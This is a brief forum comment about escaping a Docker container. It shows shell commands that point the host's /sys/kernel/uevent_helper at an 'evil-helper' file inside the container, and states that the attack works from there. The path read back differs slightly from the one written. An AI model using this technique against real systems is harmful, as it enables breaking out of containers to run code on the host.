|
|
|
|
|
|
by stevekemp
4269 days ago
|
|
|
We don't need to argue about this, but I see the same permission-denied issue as you, but that doesn't matter. The /sys is mounted already and reading/writing to it succeeds: / # mount -t sysfs sysfs /sys
mount: permission denied (are you root?)
/ # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper
/ # cat /sys/kernel/uevent_helper
/var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a906aef/tmp/evil-helper
From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but .. |
|
|